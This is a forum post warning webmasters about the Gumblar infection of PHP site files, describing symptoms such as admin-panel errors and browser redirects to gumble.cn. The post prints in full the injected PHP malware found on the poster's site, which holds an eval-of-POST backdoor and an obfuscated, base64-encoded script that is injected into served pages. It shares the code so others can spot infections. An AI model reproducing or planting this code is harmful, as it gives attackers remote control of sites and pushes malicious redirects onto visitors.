Warning - virus

lazygizmo

New Member
Thought i would give you guys a heads up about this virus affecting FTP forum files and seems be be all over the web now



Several days ago i posted this..

Code:
I recently moved host and imported my backup and all seems well until.....

When in admincp, i disable/enable/uninstall a product, it works - but i get the following error message..

"Error docLoad TypeError: wnd_.document.body is null"

Google has no information on this.

Help me if ya can

Thanks

Well the situation went from bad to worse, i began to get errors all over the admincp - categories wouldnt expand- couldnt access Edit templates and when i uninstalled ARCADE which i thought could be causing the problems i got a DB error.

Then my browser started redirecting to a site called gumble.cn so i check up on google and found this..

Has my website been hacked? - Page 5 - Dynamic Drive Forums
and this..
file keep getting attacked

I would advise you to check your php files for this...
Code:
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCdndXBtOW1ibFJnU2F5Y3IlMkVjbiUyRnJsWnN5Y3N3diUyRj9pZCUzRCcpLnJlcGxhY2UoL3BtOXxWRXxsWnx3dnxFNnx5Y3xSZ1MvZywiIikpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

Changing FTP password would be a good idea too - full system scan and whatever else.

If fairly noob to this stuff and dont completely understand, maybe one of you can shed a bit more light on it..

peace

Edit : to get more info.. google Gumblar.cn
 
Top